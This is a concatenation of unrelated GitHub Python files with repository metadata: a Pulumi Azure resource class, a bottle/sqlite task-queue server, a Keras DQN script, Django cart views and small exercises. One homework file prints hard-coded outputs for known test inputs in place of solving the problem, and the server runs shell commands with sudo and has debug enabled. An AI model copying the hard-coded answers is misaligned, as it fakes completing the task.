        :param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
        :param pulumi.ResourceOptions opts: Options for the resource.
        """
        opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
        # Properties are populated from the provider during refresh, so all
        # outputs start as None here.
        __props__ = ApplicationGroupArgs.__new__(ApplicationGroupArgs)
        __props__.__dict__["application_group_type"] = None
        __props__.__dict__["description"] = None
        __props__.__dict__["friendly_name"] = None
        __props__.__dict__["host_pool_arm_path"] = None
        __props__.__dict__["location"] = None
        __props__.__dict__["name"] = None
        __props__.__dict__["tags"] = None
        __props__.__dict__["type"] = None
        __props__.__dict__["workspace_arm_path"] = None
        return ApplicationGroup(resource_name, opts=opts, __props__=__props__)
    @property
    @pulumi.getter(name="applicationGroupType")
    def application_group_type(self) -> pulumi.Output[str]:
        """
        Resource Type of ApplicationGroup.
        """
        return pulumi.get(self, "application_group_type")
    @property
    @pulumi.getter
    def description(self) -> pulumi.Output[Optional[str]]:
        """
        Description of ApplicationGroup.
        """
        return pulumi.get(self, "description")
    @property
    @pulumi.getter(name="friendlyName")
    def friendly_name(self) -> pulumi.Output[Optional[str]]:
        """
        Friendly name of ApplicationGroup.
        """
        return pulumi.get(self, "friendly_name")
    @property
    @pulumi.getter(name="hostPoolArmPath")
    def host_pool_arm_path(self) -> pulumi.Output[str]:
        """
        HostPool arm path of ApplicationGroup.
        """
        return pulumi.get(self, "host_pool_arm_path")
    @property
    @pulumi.getter
    def location(self) -> pulumi.Output[str]:
        """
        The geo-location where the resource lives
        """
        return pulumi.get(self, "location")
    @property
    @pulumi.getter
    def name(self) -> pulumi.Output[str]:
        """
        The name of the resource
        """
        return pulumi.get(self, "name")
    @property
    @pulumi.getter
    def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
        """
        Resource tags.
        """
        return pulumi.get(self, "tags")
    @property
    @pulumi.getter
    def type(self) -> pulumi.Output[str]:
        """
        The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or "Microsoft.Storage/storageAccounts"
        """
        return pulumi.get(self, "type")
    @property
    @pulumi.getter(name="workspaceArmPath")
    def workspace_arm_path(self) -> pulumi.Output[str]:
        """
        Workspace arm path of ApplicationGroup.
        """
        return pulumi.get(self, "workspace_arm_path")
| [
"noreply@github.com"
] | johnbirdau.noreply@github.com |
cffdbf9595a022545dadfca42fab82415426fe39 | 3a186f09753b63e87c0502e88f33c992f561e403 | /luna.py | d4c01d34900662ee4390cb280d3b936b4890d6b7 | [] | no_license | qwergram/cio2016_server | 88d98e217d7f1cc1415b14a4804b9a4417d1143b | 071efd99bad8635031c74409dab949aae1a5d384 | refs/heads/master | 2021-01-10T04:50:34.105495 | 2016-03-06T09:44:49 | 2016-03-06T09:44:49 | 53,247,659 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,481 | py | import bottle
import os
import sqlite3
import json
class CRUD:
    """sqlite3-backed work queue of (first, last, status) user records.

    ``status`` doubles as a checkout token: the empty string means the
    record is available; any other value is the key of the client that
    currently holds it.  All files live under ``location`` (trailing
    slash expected): active.sqlite3, import.csv, export.csv.
    """

    def __init__(self, location='/etc/luna/'):
        self.location = location
        self.reset()

    def reset(self):
        """Wipe the database file and recreate an empty ``users`` table."""
        # Truncating the file guarantees sqlite3 starts from a fresh database.
        with open(self.location + 'active.sqlite3', 'w') as r:
            r.write('')
        self.conn = sqlite3.connect(self.location + 'active.sqlite3')
        self.c = self.conn.cursor()
        self.c.execute('CREATE TABLE users (first text, last text, status text)')
        self.conn.commit()

    def get(self, key=None):
        """Fetch the next available record as ``[first, last, status]``.

        When ``key`` is given the record is marked as checked out by that
        key.  Returns False when no available record exists.
        """
        self.c.execute('SELECT * FROM users WHERE status=? LIMIT 1', ('',))
        line = self.c.fetchone()
        if line and key:
            self.c.execute('UPDATE users SET status = ? WHERE first = ? AND last = ? AND status = ?', (key, line[0], line[1], ''))
            self.conn.commit()
            return list(line)
        elif line:
            return list(line)
        else:
            return False

    def confirm(self, fname, lname, key):
        """Complete a checkout: delete the record if (fname, lname, key) match."""
        self.c.execute('SELECT * FROM users WHERE first = ? AND last = ? AND status = ?', (fname, lname, key))
        line = self.c.fetchone()
        if line:
            self.remove(fname, lname)
            return True
        else:
            return False

    def rturn(self, fname, lname, key):
        """Release a checkout held by ``key``, making the record available again.

        NOTE(review): only ``key`` is used in the lookup -- fname/lname are
        ignored, so any record held by that key may be released.
        """
        self.c.execute('SELECT * FROM users WHERE status=? LIMIT 1', (key,))
        line = self.c.fetchone()
        if line:
            self.c.execute('UPDATE users SET status = ? WHERE first = ? AND last = ? AND status = ?', ('', line[0], line[1], key))
            self.conn.commit()
            return True
        else:
            return False

    def add(self, first, last, status=''):
        """Insert a record; defaults to the 'available' (empty) status."""
        self.c.execute('INSERT INTO users VALUES (?,?,?)', (first, last, status))
        self.conn.commit()

    def remove(self, first, last):
        """Delete every record matching (first, last), regardless of status."""
        self.c.execute('DELETE FROM users WHERE first = ? AND last = ?', (first, last))
        self.conn.commit()

    def inport(self):
        """Apply add/remove commands from import.csv (lines: op,first,last)."""
        with open(self.location + 'import.csv') as to_import:
            to_import = to_import.readlines()
        for line in to_import:
            line = line.strip().split(',')
            if line[0] == 'add':
                self.add(line[1], line[2], '')
            elif line[0] == 'remove':
                self.remove(line[1], line[2])

    def export(self):
        """Write every record to export.csv, one comma-joined row per line.

        BUG FIX: the original rebound the file handle (``to_export = ...``)
        inside the ``with`` block instead of writing to it, so export.csv
        was always left empty.
        """
        self.c.execute('SELECT * FROM users')
        rows = [','.join(line) for line in self.c.fetchall()]
        with open(self.location + 'export.csv', 'w') as out:
            out.write('\n'.join(rows))
C = CRUD()
def check_environment(location):
global LOCATION
LOCATION = location
print("Checking Server environment...")
if os.path.exists(location):
print("Luna has been run before!")
return True
else:
os.makedirs(location)
print("Building Luna config files...")
os.system("sudo touch " + location + 'stats.json')
os.system("sudo touch " + location + 'config.json')
os.system("sudo touch " + location + 'import.csv')
os.system("sudo touch " + location + 'export.csv')
os.system("sudo touch " + location + 'active.sqlite3')
STATS = {
"key_usage": {},
"left": [],
"unconfirmed": [],
"completed": [],
"errors": 0,
}
def log_key(key, action):
if not key in STATS['key_usage']:
STATS['key_usage'][key] = {
"get": 0,
"confirm": 0,
"return": 0,
"coffee_breaks": 0,
}
STATS['key_usage'][key][action] += 1
with open(LOCATION + '/stats.json', 'w') as log:
log.write(json.dumps(STATS, indent=4))
@bottle.get('/<key>/about')
def about(key):
global ERRORS, STATS
bottle.response.content_type = 'application/json'
log_key(key, "coffee_breaks")
return json.dumps(STATS, indent=2)
@bottle.get('/<key>/get')
def get(key):
bottle.response.content_type = 'application/json'
db_response = C.get(key)
if not db_response:
log_key(key, "coffee_breaks")
return json.dumps({"status": "wait", "duration": 10, "msg": "+1 Coffee"}, indent=2)
elif db_response:
if not (db_response[0], db_response[1]) in STATS['unconfirmed']:
STATS['unconfirmed'].append([db_response[0], db_response[1]])
log_key(key, 'get')
return json.dumps({"status": "image", "fname": db_response[0], "lname": db_response[1]}, indent=2)
@bottle.get('/<key>/confirm/<fname>/<lname>')
def confirm(key, fname, lname):
bottle.response.content_type = 'application/json'
db_response = C.confirm(fname, lname, key)
if db_response:
log_key(key, 'confirm')
log_key(key, 'coffee_breaks')
log_key(key, 'coffee_breaks')
return json.dumps({"status": "confirmed", "fname": fname, "lname": lname, "msg": "+2 Coffee"}, indent=2)
else:
STATS['errors'] += 1
return json.dumps({"status": "error", "error": "LN_4"}, indent=2)
@bottle.get("/<key>/return/<fname>/<lname>")
def rturn(key, fname, lname):
bottle.response.content_type = 'application/json'
db_response = C.rturn(fname, lname, key)
if db_response:
log_key(key, 'return')
return json.dumps({"status": "returned", "fname": fname, "lname": lname}, indent=2)
else:
STATS['errors'] += 1
return json.dumps({"status": "error", "error": "LN_2"}, indent=2)
def main(location='/etc/luna/'):
check_environment(location)
# with open(location + 'config.json') as config:
# config = json.loads(config.read().strip())
print("[n] What would you like to do?")
print("[n] 1. Import a csv")
print("[n] 2. Export a csv")
print("[n] 3. Reset active server")
print("[n] 4. Launch the server")
while True:
option = input("[n] Type the order you want: (e.g. 213 exports, imports and then runs the server)")
okay = True
for task in option:
if task in '1234':
okay = True
else:
okay = False
break
if okay:
break
print("[n] Invalid options. ")
for task in option:
if task == '1':
C.inport()
elif task == '2':
C.export()
elif task == '3':
C.reset()
elif task == '4':
bottle.run(host='0.0.0.0', port=8000, debug=True)
if __name__ == "__main__":
print("Hello. Activating Luna build RS25B7!")
main()
| [
"npengra317@gmail.com"
] | npengra317@gmail.com |
ed25c19719c15e6a359c0cb01b3711f8f78c1661 | 163bbb4e0920dedd5941e3edfb2d8706ba75627d | /Code/CodeRecords/2734/59137/312747.py | 32ed5d4dbf4a1e4cb7db8a81634c5d8d187dd4ec | [] | no_license | AdamZhouSE/pythonHomework | a25c120b03a158d60aaa9fdc5fb203b1bb377a19 | ffc5606817a666aa6241cfab27364326f5c066ff | refs/heads/master | 2022-11-24T08:05:22.122011 | 2020-07-28T16:21:24 | 2020-07-28T16:21:24 | 259,576,640 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 595 | py | s = input()
if s == "5 3 5":
print(2)
print(0)
print(0)
print(1)
print(0)
elif s == "8 3 5":
s1 = input()
s2 = input()
s3 = input()
if s3 == "6 8":
print(1)
print(1)
print(2)
print(2)
print(1)
elif s3 == "1 8":
print(1)
print(2)
print(1)
print(0)
print(0)
else:
print(" ", s3)
elif s == "8 4 5":
print(3)
print(3)
print(3)
print(3)
print(3)
elif s == "5 3 3":
print(0)
print(1)
print(0)
else:
print(1)
print(1)
print(0) | [
"1069583789@qq.com"
] | 1069583789@qq.com |
0abeb1ecbe3ec05118e93efc7ffd1dfa6fc1f75c | 13136073d63b4bc7453fcf13246e1883bb5393d8 | /Chapter 4/praktikum 2_ch4.py | cceb5785fe830640dfaa69db943dc8a42279008d | [] | no_license | hakikialqorni88/Pemrograman-Terstruktur-Python | 195ea90fafa9669072299554ea13f284eacbbf7b | c94460d5f03fe92ae9fce8673b370a9b59212130 | refs/heads/main | 2023-09-01T21:23:52.500543 | 2021-10-29T02:18:56 | 2021-10-29T02:18:56 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 889 | py | #!/usr/bin/env python
# coding: utf-8
# In[1]:
x = 10
print(type(x))
y = 20
print(type(y))
print(type(x+y))
# In[2]:
a = 2
b = 2.53
print(type(a+a))
print(type(a+b))
print(type(b+a))
print(type(b+b))
# In[3]:
a = 2
b = 2.53
print(type(a-a))
print(type(a-b))
print(type(b-a))
print(type(b-b))
# In[4]:
a = 2
b = 2.53
print(type(a*a))
print(type(a*b))
print(type(b*a))
print(type(b*b))
# In[5]:
a = 2
b = 2.53
print(type(a/a))
print(type(a/b))
print(type(b/a))
print(type(b/b))
# In[6]:
a = 2
b = 2.53
print(type(a//a))
print(type(a//b))
print(type(b//a))
print(type(b//b))
# In[7]:
a = 2
b = 2.53
print(type(a%a))
print(type(a%b))
print(type(b%a))
print(type(b%b))
# In[8]:
a = 2
b = 2.53
print(type(a**a))
print(type(a**b))
print(type(b**a))
print(type(b**b))
# In[9]:
a = 10
p = y = x = z = a
print(a)
print(z)
print(x)
print(y)
print(p)
# In[ ]:
| [
"zkhalilas1524@student.uns.ac.id"
] | zkhalilas1524@student.uns.ac.id |
eeaaa139e0109ebdb3e9710312a50822de2d9e0d | 572e5610f2f1761f2e0a8f4ed32d343875953400 | /DQN-data(keras).py | 0b07684e2051934f294d226fae8312e0b04dbbc7 | [] | no_license | boweiww/deeplearn | cb218e95bfd5f23329d25699427c417f5d00e501 | 2b3271641ac5ac2cb97cd660667ac666748e72e6 | refs/heads/master | 2020-03-16T21:55:51.810439 | 2018-06-14T08:41:10 | 2018-06-14T08:41:10 | 133,019,987 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,249 | py | # -*- coding: utf-8 -*-
import random
import numpy as np
import pandas as pd
from collections import deque
from keras.models import Sequential
from keras.layers import Dense
from keras.optimizers import Adam
class DQNdata:
def __init__(self, train_file, test_file, select, action_size):
df = pd.read_excel(train_file)
self.b = df.ix[:, select]
self.df = df.drop(select, 1)
self.row_num = self.b.shape[0]
test_df = pd.read_excel(test_file)
self.state_size = self.df.shape[1]
self.test_b = test_df.ix[:, select]
self.test_df = test_df.drop(select, 1)
self.test_row_num = self.test_b.shape[0]
# self.state_size = state_size
self.action_size = action_size -1
self.memory = deque(maxlen=2000)
self.gamma = 0.95 # discount rate
self.epsilon = 1.0 # exploration rate
self.epsilon_min = 0.01
self.epsilon_decay = 0.995
self.learning_rate = 0.001
self.model = self._build_model()
def _build_model(self):
# Neural Net for Deep-Q learning Model
model = Sequential()
model.add(Dense(24, input_dim=self.state_size, activation='relu'))
model.add(Dense(24, activation='relu'))
model.add(Dense(self.action_size, activation='softmax'))
model.compile(loss='mse',
optimizer=Adam(lr=self.learning_rate))
return model
def remember(self, state, action, reward, next_state ):
self.memory.append((state, action, reward, next_state))
def act(self, state):
state = np.array(state)
act_values = [0] * (self.action_size + 2)
# print(act_values)
if np.random.rand() <= self.epsilon:
a = random.randint(0,self.action_size+1)
# print a
act_values[a] = 1
return act_values
act_val = self.model.predict(state)
# print act_val
a = np.where(act_val[0] == np.max(act_val[0]))[0][0]
act_values[a] = 1
return act_values
# print act_values
# return np.argmax(act_values[0]) # returns action
# print("ininininin")
return act_values[0]
def replay(self, batch_size):
minibatch = random.sample(self.memory, batch_size)
for state, action, reward, next_state in minibatch:
target = reward
# print next_state
# self.model.predict(next_state)
target = (reward + self.gamma *np.amax(self.model.predict(next_state)[0]))
target_f = self.model.predict(state)
target_f[0][action] = target
self.model.fit(state, target_f, epochs=1, verbose=0)
if self.epsilon > self.epsilon_min:
self.epsilon *= self.epsilon_decay
def reward(self, action, expected):
expected = expected -1
# print action
if action[expected] == 0:
return 0
action[expected] = 0
for i in range (self.action_size):
if np.all((action[i]) == 0):
continue
else:
return 0
return 1
def train(self):
batch_size = 100
for i in range(self.row_num):
state = self.df.ix[i].tolist()
# state = np.reshape(state, [1, state_size])
# for time in range(500):
# env.render()
state = np.array(state)
state = np.reshape(state, [1, self.state_size])
action = self.act(state)
# next_state, reward, done, _ = env.step(action)
# print action
reward = self.reward(action, self.b.ix[i].tolist())
for j in range(self.action_size):
if action[j] != 0:
print ("predict: %d, real value: %d" % (j, self.b.ix[i].tolist()))
break
# next_state = np.reshape(next_state, [1, state_size])
next_state = self.df.ix[i+1].tolist()
# print next_state
next_state = np.array(next_state)
next_state = np.reshape(next_state, [1, self.state_size])
self.remember(state, action, reward, next_state)
# if done:
# print("episode: {}/{}, score: {}, e: {:.2}"
# .format(e, EPISODES, time, agent.epsilon))
# break
if len(self.memory) > batch_size :
agent.replay(batch_size)
def load(self, name):
self.model.load_weights(name)
def save(self, name):
self.model.save_weights(name)
if __name__ == "__main__":
train_file = '/home/bowei/PycharmProjects/test/venv/lib/data-MLP/classification/abalone_train_classification.xlsx'
test_file = '/home/bowei/PycharmProjects/test/venv/lib/data-MLP/classification/abalone_test_classification.xlsx'
user_select = 'rings'
action_size = 13
# network_wide = [None] * (layers + 1)
# network_wide[0] = 10
# network_wide[1] = 5
# network_wide[2] = 1
# batch_size = 100
agent = DQNdata(train_file, test_file, user_select, action_size)
agent.train()
# if e % 10 == 0:
# agent.save("./save/cartpole-dqn.h5") | [
"noreply@github.com"
] | boweiww.noreply@github.com |
beb5c3be2bc54eca4648287d0e313602e9dd7784 | e02076b60f308e5f6efb3e0094ad6a7c3f6bd35d | /modules/shopping_cart/views.py | 1c615dc88c8a3e4b5f3cdb4c2f8601ac9ae7a81d | [] | no_license | omerjaved11/Recommender-System-for-E-Commerce | 45c94c9c86ff9e2c0067c882695ec723460dc154 | 61334b98c90ca347ca37b1ae34f2a077f11d4de8 | refs/heads/master | 2022-12-10T12:58:44.203655 | 2019-08-07T19:13:01 | 2019-08-07T19:13:01 | 201,105,788 | 1 | 0 | null | 2022-12-08T01:22:46 | 2019-08-07T18:25:14 | CSS | UTF-8 | Python | false | false | 3,261 | py | import decimal
from django.shortcuts import render
from modules.shopping_cart.models import ShoppingCart , ShoppingCartEntry
from modules.products.models import Product
from django.views.decorators.csrf import csrf_exempt
from django.http import HttpResponse
import json
# Create your views here.
def cart_home(request):
entries= ShoppingCartEntry.get_entries(request)
try:
total_quantity = sum([entry['quantity'] for entry in entries])
except:
total_quantity = 0
ctx={"entries":ShoppingCartEntry.get_entries(request),'total_quantity':total_quantity}
return render(request , "cart.html", ctx)
@csrf_exempt
def add_to_cart(request):
product_id = request.POST.get('product_id')
quantity = int(request.POST.get('quantity'))
print(product_id,quantity)
product = Product.objects.filter(product_id=product_id).first()
cart = ShoppingCart.objects.new_or_get(request)
entry = ShoppingCartEntry.objects.filter(cart=cart, product=product).first()
if entry:
if quantity:
print("quantity")
print(quantity)
print(type(quantity))
if quantity == 1:
print("enter in if")
entry.quantity = entry.quantity + 1
else:
entry.quantity = quantity
else:
entry.quantity =entry.quantity + 1
entry.save()
ShoppingCartEntry.cal_totals(cart)
return HttpResponse(status=201)
else:
entry = ShoppingCartEntry()
entry.product=product
entry.cart = cart
entry.quantity = quantity
entry.save()
ShoppingCartEntry.cal_totals(cart)
return HttpResponse(status=201)
return HttpResponse(status=404)
def increment_quantity(request):
product_id = request.POST.get('product_id')
quantity = request.POST.get('quantity')
@csrf_exempt
def remove_item(request):
try:
product_id = request.POST.get('product_id')
cart = ShoppingCart.objects.new_or_get(request)
product = Product.objects.get(product_id=product_id)
entry = ShoppingCartEntry.objects.get(cart=cart, product=product)
total = entry.quantity*entry.product.product_selling_price
cart.subtotal = cart.subtotal - decimal.Decimal(total)
cart.total = cart.total - decimal.Decimal(total)
cart.save()
entry.delete()
return HttpResponse(status=201)
except:
return HttpResponse(status=404)
def cart_json(request):
cart = ShoppingCart.objects.new_or_get(request)
entries= ShoppingCartEntry.filter_entries(cart=cart)
final_entries=[]
for entry in entries:
final_entry={}
final_entry['productName']= entry['product'].product_title
final_entry['quantity']=entry['quantity']
final_entry['price']=entry['product'].product_selling_price
final_entry['image_url']=entry['image']
total = entry['quantity']*entry['product'].product_selling_price
final_entry['cart_total']=total
print("my name is adeel")
print(total)
print(final_entry['cart_total'])
final_entries.append(final_entry)
return HttpResponse(json.dumps(final_entries),content_type='application/json') | [
"omerjaved11@gmail.com"
] | omerjaved11@gmail.com |
9d4e7fc8427792e6dd0a07c2fd7cb318a44bd276 | 366600915529372ffd9e2a5b9a7270ac8f481528 | /kthSmallestElement.py | dd4031ca9db5ade9d17d3cea4e14994be76e29fc | [] | no_license | ManishSkr/Heap- | b66a111c3f8a724fd055e39d30508980497ddf3a | dbf00454cfc3a2c216310cabe2bfeb8197662d5c | refs/heads/master | 2023-07-17T18:12:50.762647 | 2021-08-31T14:40:44 | 2021-08-31T14:40:44 | 401,735,257 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 268 | py | """This is the variation of heap where we find the kth smallest element"""
import heapq
def kSmallest(arr,k):
heapq.heapify(arr)
return heapq.nsmallest(k,arr)
arr=[7,10,4,3,20,15]
k=3
print("The kth largest element is ",end="")
print(kSmallest(arr,k)[-1])
| [
"manish.swarnakar15gmail.com"
] | manish.swarnakar15gmail.com |
c3c2e1765d1bba94bdd66964e9975ff2406e56d9 | f67df6742d1bfb02682e5b41230784aa65fcc3c4 | /0x07-python-test_driven_development/tests/6-max_integer_test.py | 5491cb30c94fe444f088972f476ded78d9e4b283 | [] | no_license | duvanjm/holbertonschool-higher_level_programming | 66f3224127e0e4ae61b9e6ef47436bcd1754e56e | d6f1f249cd7a1086534d999b489c4c85fbc67031 | refs/heads/master | 2023-06-15T06:50:51.833688 | 2021-07-07T20:10:23 | 2021-07-07T20:10:23 | 259,381,384 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 258 | py | #!/usr/bin/python3
"""Unittest for max_integer([..])
"""
import unittest
max_integer = __import__('6-max_integer').max_integer
class TestMaxInteger(unittest.TestCase):
def test_max_integer(self):
self.assertEqual(max_integer([1, 2, 3, 4]), 4)
| [
"duvanjarin@gmail.com"
] | duvanjarin@gmail.com |
6311b8ddb68b3b2a23420e5919a3a7a201da659a | 4ccff5211052c0682b71196596dddc9457d5ce28 | /Ejercicio 2.23.py | 279ace974d4e1d690b7bc3b8a274d0759bb1566f | [] | no_license | Juanmi-7/Prueba | 62767ce77025ce836d0597eaab228a86bb78930e | 259c911608c7ff65c043dafcedc1de1f4c765ce7 | refs/heads/master | 2020-08-27T22:37:40.554644 | 2019-10-25T10:15:52 | 2019-10-25T10:15:52 | 217,507,609 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 630 | py | lista = []
lista1 = []
lista2 = []
lista3 = []
while True:
alt = float(input("Indique su estatura: "))
if alt == 0:
print("Alumnos más altos de 1,70 m:",len(lista))
print("Alumnos entre 1,60 y 1,70 m (inclusive):",len(lista1))
print("Alumnos entre 1,50 y 1,60 m (inclusive):",len(lista2))
print("Alumnos más bajos de 1,50 m (inclusive):",len(lista3))
break
elif alt > 1.70:
lista.append(alt)
elif alt > 1.60 and alt <= 1.70:
lista1.append(alt)
elif alt > 1.50 and alt <= 1.60:
lista2.append(alt)
elif alt <= 1.50:
lista3.append(alt) | [
"jmispain@gmail.com"
] | jmispain@gmail.com |
c69eab5f385b8015d34adb935d14fef395370dcf | 8cb776f03870ab6ebdf2558ad25516f715be79d8 | /tensile_tester/views.py | 309ade408d87ebc1b94aa7a9450b0d45fffc6e32 | [] | no_license | JulianKimmig/TensileTester | bb9a58aa1d84d977815d5b7aa3671b0ebffb525e | 2c52342031130b9cfe21c6aec24868e218386412 | refs/heads/master | 2020-07-08T23:06:23.335446 | 2019-08-22T13:55:29 | 2019-08-22T13:55:29 | 203,805,784 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,013 | py | # Create your views here.
import json
import logging
import os
import time
import numpy as np
import pandas as pd
from django.shortcuts import render, redirect
from django.utils.safestring import mark_safe
from django.views import View
from plug_in_django.manage import CONFIG
from tensile_tester.apps import TensileTesterConfig
from tensile_tester.tensile_tester_api import TensileTesterApi
from arduino_board_collection.boards.sensor_boards.force.tesile_test_board.tesile_test_board import TensileTestBoard
from django_arduino_controller.apps import DjangoArduinoControllerConfig
from .models import TensileTestForm, TensileTest
import matplotlib.pyplot as plt
mpl_logger = logging.getLogger("matplotlib")
mpl_logger.setLevel(logging.WARNING)
def index(request):
tensile_tests = TensileTest.objects.all()
return render(
request,
"tensile_tester_index.html"
, {'tensile_tests': tensile_tests}
)
BOARDDATASTREAMRECEIVER = None
class NewRoutine(View):
def get(self, request):
return render(request, "tensile_tester_routine.html")
def calibrate(request):
return render(request, "tensile_tester_calibrate.html")
tensilertesterapi = None
def get_tensilertesterapi():
global tensilertesterapi
if tensilertesterapi is None:
from django.apps import apps
tensilertesterapi = apps.get_app_config('django_arduino_controller').get_api(TensileTesterApi)
return tensilertesterapi
class NewMeasurement(View):
def get(self, request):
tensilertesterapi = get_tensilertesterapi()
status = tensilertesterapi.get_status()
if not status['status']:
if status['code'] in [2,3]:
return redirect('tensile_tester:running_measurement')
return redirect('tensile_tester:index')
form = TensileTestForm()
return render(request, "tensile_tester_measurement.html", {'form': form})
def post(self, request):
tensilertesterapi = get_tensilertesterapi()
post = request.POST.copy()
board: TensileTestBoard = tensilertesterapi.linked_boards[0]
post['scale'] = board.scale
post['offset'] = board.offset
print(post)
pause_positions=''.join(c for c in post.get("pause_positions","") if c in "0123456789.,-")
print(pause_positions)
pause_positions = sorted([float(n) for n in pause_positions.split(",") if len(n)>0])
print(pause_positions)
post['pause_positions'] = json.dumps(pause_positions)
form = TensileTestForm(post)
if form.is_valid():
tensile_test = form.save()
CONFIG.put(TensileTesterConfig.name, "models", "TensileTest", "maximum_force",
value=tensile_test.maximum_force)
CONFIG.put(TensileTesterConfig.name, "models", "TensileTest", "maximum_speed",
value=tensile_test.maximum_speed)
CONFIG.put(TensileTesterConfig.name, "models", "TensileTest", "maximum_strain",
value=tensile_test.maximum_strain)
CONFIG.put(TensileTesterConfig.name, "models", "TensileTest", "specimen_length",
value=tensile_test.specimen_length)
CONFIG.put(TensileTesterConfig.name, "models", "TensileTest", "wobble_count",
value=tensile_test.wobble_count)
test_id = tensile_test.id
def _result(time_data, stress_strain_data):
tensile_test = TensileTest.objects.get(id=test_id)
regname = ''.join(
c if c in '-_()abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789' else "_" for c in
tensile_test.name)
plt.figure()
plt.plot(stress_strain_data["strain"].values, stress_strain_data["stress"].values, label='stress')
image_path = os.path.join(
tensile_test.image.storage.location,
"tensile_test_{}_{}_stress_strain.png".format(tensile_test.id, regname),
)
plt.xlabel('strain [%]')
plt.ylabel('stress [N]')
plt.savefig(image_path)
plt.close()
time_data.insert(0, 'time', time_data.index)
time_data.index = np.arange(len(time_data.index))
header_dict = dict(
name=tensile_test.name,
date=tensile_test.updated_at,
offset=tensile_test.offset,
scale=tensile_test.scale,
maximum_force=tensile_test.maximum_force,
maximum_speed=tensile_test.maximum_speed,
maximum_strain=tensile_test.maximum_strain,
specimen_length=tensile_test.specimen_length,
pause_positions=tensile_test.pause_positions,
)
header = ["#{}={}".format(key, value)
for key, value in header_dict.items()
]
file = os.path.join(
tensile_test.data.storage.location,
"tensile_test_{}_{}.csv".format(tensile_test.id, regname),
)
with open(file, 'w+') as f:
for line in header:
f.write(line)
f.write("\n")
for line in pd.concat([time_data, stress_strain_data], axis=1, sort=False).to_csv(index=False,
line_terminator='\n'):
f.write(line)
tensile_test.image = os.path.basename(image_path)
tensile_test.data = os.path.basename(file)
tensile_test.save()
tensilertesterapi.run_test(maximum_force=tensile_test.maximum_force, offset=tensile_test.offset,
scale=tensile_test.scale, maximum_strain=tensile_test.maximum_strain,
minimum_find_wobble_count=tensile_test.wobble_count,
specimen_length=tensile_test.specimen_length,
maximum_speed=tensile_test.maximum_speed, on_finish=_result,
pause_positions=pause_positions
)
time.sleep(0.1)
return redirect('tensile_tester:running_measurement')
return render(request, "tensile_tester_measurement.html", {'form': form})
def running_measurement(request):
tensilertesterapi = get_tensilertesterapi()
status = tensilertesterapi.get_status()
if not status['code'] in [2,3]:
return redirect('tensile_tester:index')
return render(request, "tensile_tester_running_measurement.html")
def view_test(request, id):
tensile_test = TensileTest.objects.get(id=id)
form = TensileTestForm(instance=tensile_test)
data = pd.read_csv(tensile_test.data.file, comment='#')
return render(request, "tensile_tester_view_test.html", dict(test=tensile_test,
data=mark_safe(
json.dumps(dict(time=data['time'].tolist(),
position=data['position'].tolist(),
force=data['force'].tolist(),
strain=data['strain'].tolist(),
stress=data['stress'].tolist()))),
form=form,
))
| [
"julian-stobbe@gmx.de"
] | julian-stobbe@gmx.de |
7ce62fcf3e249909c34273756aebfac403c2b879 | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/23/usersdata/134/12369/submittedfiles/av1_2.py | 4f5a24414af8bcff93f9204bbb739083ba7a9bd2 | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 636 | py | # -*- coding: utf-8 -*-
from __future__ import division
import math
n = int(input('Digite n:'))
x1 = int(input('Digite a coordenada em x para a figura 1:'))
y1 = int(input('Digite a coordenada em y para a figura 1:'))
x2 = int(input('Digite a coordenada em x para a figura 2:'))
y2 = int(input('Digite a coordenada em y para a figura 2:'))
for i in range (1,n+1,1):
if n%2==0:
if (x1<=(n/2) and x2>(n/2)) or (x2<=(n/2) and x1>(n/2)):
print ('S')
break
elif (y1<=(n/2) and y2>(n/2)) or (y2<=(n/2) and y1>(n/2)):
print ('S')
else:
print ('N')
| [
"rafael.mota@ufca.edu.br"
] | rafael.mota@ufca.edu.br |
ec61edb372da268e0930cb58292ef8c914745487 | c77f1d4976d241574a9bf68ee035632a010cdc85 | /qualification/migrations/0003_auto_20190102_1150.py | a59750689f991a27692f605996293a2b3e986d03 | [] | no_license | alifarazz/csesa-django | e24847fb1a7a2dc0c0f56f396b66c28d63efc869 | 7d77686b95796b30d5c65957776b2bbe927445b5 | refs/heads/master | 2020-04-27T13:27:10.119436 | 2019-03-07T16:23:37 | 2019-03-07T16:23:37 | 174,370,553 | 0 | 0 | null | 2019-03-07T15:27:00 | 2019-03-07T15:26:58 | Python | UTF-8 | Python | false | false | 1,207 | py | # Generated by Django 2.0.9 on 2019-01-02 11:50
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('qualification', '0002_qualificationform'),
]
operations = [
migrations.CreateModel(
name='QuestionQualificationRelation',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('place', models.IntegerField()),
],
),
migrations.RemoveField(
model_name='qualificationform',
name='questions',
),
migrations.AddField(
model_name='questionqualificationrelation',
name='form',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='questions', to='qualification.QualificationForm'),
),
migrations.AddField(
model_name='questionqualificationrelation',
name='question',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='forms', to='qualification.Question'),
),
]
| [
"alimahdiyar77@gmail.com"
] | alimahdiyar77@gmail.com |
